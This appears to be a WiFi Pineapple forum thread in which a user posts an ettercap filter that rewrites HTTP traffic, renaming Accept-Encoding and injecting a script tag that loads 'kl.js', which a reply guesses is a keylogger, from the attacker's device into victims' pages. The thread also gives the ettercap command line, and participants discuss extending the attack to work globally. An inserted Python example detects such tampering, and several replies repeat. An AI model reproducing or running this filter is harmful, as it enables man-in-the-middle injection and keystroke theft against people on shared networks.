
Ettercap Not Replacing


Vulture


Anyone here try using ettercap filters on the pineapple itself and not via a plugged in PC?

Ettercap appears to be working quite well except that my filter doesn't actually replace anything into the data stream.

Here is pretty much the most generic filter:

    # Requests to ports 80/8080: rename the Accept-Encoding header
    if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.dst == 80 || tcp.dst == 8080) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
        }
    }

    # Responses from ports 80/8080: insert a script tag after the opening head tag
    if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.src == 80 || tcp.src == 8080) {
        if (search(DATA.data, "<head>")) {
            replace("<head>", "<head><script type=\"text/javascript\" src=\"http://172.16.42.1/kl.js\"></script>");
            msg("iframe injected after <head>\n");
        }
        if (search(DATA.data, "<HEAD>")) {
            replace("<HEAD>", "<HEAD><script type=\"text/javascript\" src=\"http://172.16.42.1/kl.js\"></SCRIPT>");
            msg("iframe injected after <HEAD>\n");
        }
    }

The msgs are being triggered, but the stream sent to the client contains none of the replaced data. Also, I noticed when you enable ettercap you must issue the "echo "1" > /proc/sys/net/ipv4/ip_forward" command for ICS to still be enabled.

I have tried the following adapters: wlan0, br-lan, 3g-wan2 (Internet)

Command I am running: ettercap -T -i 3g-wan2 -q -F test.ef

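An added example, not part of the original post or of ettercap: a Python check for the traces the filter above would leave in an HTTP exchange if its substitutions reached the wire (a renamed Accept-Encoding header, a body longer than its declared Content-Length, and a script loaded from a private address). The function names, the header allow-list and the sample traffic are constructed for illustration, and the Content-Length check assumes the in-path rewrite changes the body length without updating that header.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

STANDARD_ACCEPT = {"accept", "accept-charset", "accept-encoding", "accept-language"}

class ScriptSrc(HTMLParser):  # collects the src of every <script> tag, any case
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs += [v for k, v in attrs if k == "src" and v]

def split_message(raw):
    """Split a raw HTTP message into (lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    pairs = (l.partition(":") for l in head.decode("latin-1").split("\r\n")[1:])
    return {n.strip().lower(): v.strip() for n, _, v in pairs}, body

def is_private_literal(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:          # a DNS name, not an IP literal
        return False

def audit_exchange(request, response, origin_host):
    """request: as received by the server; response: as received by the client."""
    findings = []
    req, _ = split_message(request)
    odd = [h for h in req if h.startswith("accept-") and h not in STANDARD_ACCEPT]
    if odd and "accept-encoding" not in req:
        findings.append("request: no Accept-Encoding, unknown header " + odd[0])
    resp, body = split_message(response)
    if "content-length" in resp and int(resp["content-length"]) != len(body):
        findings.append("response: Content-Length %s, body %d bytes" % (resp["content-length"], len(body)))
    parser = ScriptSrc()
    parser.feed(body.decode("latin-1"))
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host and host != origin_host and is_private_literal(host):
            findings.append("response: script from private address " + host)
    return findings

# Constructed sample traffic for a public site, example.com (not captured data).
CLEAN_BODY = b"<html><head><title>t</title></head><body>hi</body></html>"
HEAD = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(CLEAN_BODY)
TAMPERED_REQ = b"GET / HTTP/1.1\r\nHost: example.com\r\nAccept-Nothing!: gzip\r\n\r\n"
TAMPERED_RESP = HEAD + CLEAN_BODY.replace(b"<head>", b'<head><script src="http://172.16.42.1/kl.js"></script>')
```

Calling `audit_exchange(TAMPERED_REQ, TAMPERED_RESP, "example.com")` returns one finding per trace; an unmodified exchange returns an empty list.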

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution with ettercap which works, he can post to the forum :)

Edited by Whistle Master

I can't be of any help for the moment but I will investigate some stuff in the same direction.

Let me guess, kl.js means keylogger :P In that case, this thread could interest you.

Whenever one of us finds a solution which works, he can post to the forum :)

Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof; however, that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night. If what I am doing doesn't work, I will probably just shift gears and create a bunch of templates for your module.


Whistle Master,

I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof; however, that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night. If what I am doing doesn't work, I will probably just shift gears and create a bunch of templates for your module.

Darren's comment also got my attention. I'm also working on a new version of the module to get off dnsspoof and use ettercap which will be great as we would not need templates any more :)

Keep me posted if you manage to get ettercap working!
